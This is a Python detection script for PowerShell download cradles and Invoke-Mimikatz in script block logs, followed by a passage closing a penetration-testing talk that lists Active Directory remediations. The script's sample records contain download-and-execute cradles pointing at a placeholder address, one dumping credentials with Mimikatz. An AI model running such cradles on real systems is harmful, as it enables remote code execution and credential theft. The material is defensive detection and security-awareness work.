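"Never touching disk" only defeats file-based antivirus. PowerShell Script Block Logging (Event ID 4104) records the script text as it is executed, including what a download cradle pulled into memory, so the exact command pattern the speaker just described is a reliable detection hook. The script below is an added example for this transcript, not code from the talk or from any of the tools it uses: it runs two small rules over constructed 4104-style records (the cradle from the demo, some benign admin commands, and a second cradle variant) and reports which rules each record trips. The hostnames, user names and the 192.0.2.10 address are constructed placeholders.

```python
"""Flag PowerShell download cradles and Invoke-Mimikatz in script block logs.

Constructed example. Input records are shaped like PowerShell Script Block
Logging events (Event ID 4104): (record id, host, user, script block text).
A "cradle" is flagged only when one block contains both an in-memory
execution primitive and a remote fetch; a fetch alone is a lower-severity hit.
"""
import re
from typing import Dict, List, Tuple

EXEC_PRIMITIVE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
REMOTE_FETCH = re.compile(
    r"(net\.webclient|downloadstring|downloaddata|invoke-webrequest|iwr\b"
    r"|invoke-restmethod|irm\b)",
    re.IGNORECASE,
)
MIMIKATZ = re.compile(r"(invoke-mimikatz|-dumpcreds|sekurlsa)", re.IGNORECASE)

# Constructed 4104-style records. 192.0.2.10 is a TEST-NET placeholder.
SAMPLE_EVENTS: List[Tuple[int, str, str, str]] = [
    (1001, "APPSERVER01", "SQLService",
     "IEX (New-Object Net.WebClient).DownloadString("
     "'http://192.0.2.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"),
    (1002, "APPSERVER01", "helpdesk",
     "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU -Descending"),
    (1003, "DC01", "svc_backup",
     "Invoke-WebRequest -Uri 'https://updates.example.com/agent.msi' "
     "-OutFile C:\\Temp\\agent.msi"),
    (1004, "WORKSTATION01", "bob",
     "iex (iwr 'http://192.0.2.10/a.txt' -UseBasicParsing).Content"),
]


def classify_script_block(text: str) -> List[str]:
    """Return the names of every rule the script block matches, in fixed order."""
    hits: List[str] = []
    if EXEC_PRIMITIVE.search(text) and REMOTE_FETCH.search(text):
        hits.append("download-cradle")   # fetch plus in-memory execution
    elif REMOTE_FETCH.search(text):
        hits.append("remote-fetch")      # download only; worth a look, not an alert
    if MIMIKATZ.search(text):
        hits.append("invoke-mimikatz")
    return hits


def scan_events(events: List[Tuple[int, str, str, str]]) -> Dict[int, List[str]]:
    """Map record id -> matched rule names, for records that matched anything."""
    results: Dict[int, List[str]] = {}
    for record_id, _host, _user, block in events:
        hits = classify_script_block(block)
        if hits:
            results[record_id] = hits
    return results


if __name__ == "__main__":
    for record_id, host, user, block in SAMPLE_EVENTS:
        hits = classify_script_block(block)
        print(f"{record_id} {host} {user}: {', '.join(hits) if hits else 'clean'}")
```

In production the records would come from the Microsoft-Windows-PowerShell/Operational log (forwarded to your SIEM); the rules stay deliberately simple because 4104 gives you the decoded block, so you are matching on what actually ran rather than on whatever encoding wrapped it on the wire.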
go. Type our password. I am a crafty admin. And I screw that up, of course. Running out of time. I can't type the password, but I guarantee, I tell you, it works. So now we're domain administrator on the network. We've gone all the way up there using a couple different techniques. Just want to recap really quick, talk about some remediations quickly. Don't open Spotify.

So in summary, be aware of all the information you have out there online about your organization. If you're on the blue team side, use hacking tools. Go see what the hackers are going to do to try and enumerate information about your network, and then try and protect yourself. Always be tweaking your spam filters. You cannot set up a spam filter and just leave it forever. You should constantly be updating the definitions, updating malicious domains, and testing it to make sure that it actually works. Never stop training your end users. Not going to lie, you're fighting an uphill battle here. But the more visibility they get into phishing attacks, and if you reward your users for reporting phishing attacks, the better off you're going to be. Disable ClickOnce if you're not using it, which most people don't. It just disables some trust relationships within Internet Explorer, and it should prevent it from running. Don't use SPNs for service accounts. There's managed service accounts within Active Directory now you can use that work much better; they lock down the authentication and do some other things to make them more secure. But I have heard there's issues with that too, so do your research. If you are going to use SPNs, assign strong passwords. Do not use group policy to push passwords. There's actually a patch pushed now that doesn't allow you to do this, but we still, almost on a weekly basis, find organizations with stale passwords sitting in there, sitting in the SYSVOL share of the domain controller, that might be a few years old but are still valid somewhere. And privileged account management. If that administrator hadn't been logged into that server, I wouldn't have been able to Mimikatz his password. Privileged account management is really, really big. I really recommend doing an audit of all your administrative accounts on your domain and figuring out how you can get rid of those as much as possible and limit their exposure on the network.

Finally, I just have a list of all the tools I use. So since I'm running out of time, are there any questions? All right. Well, thanks a lot. [Applause]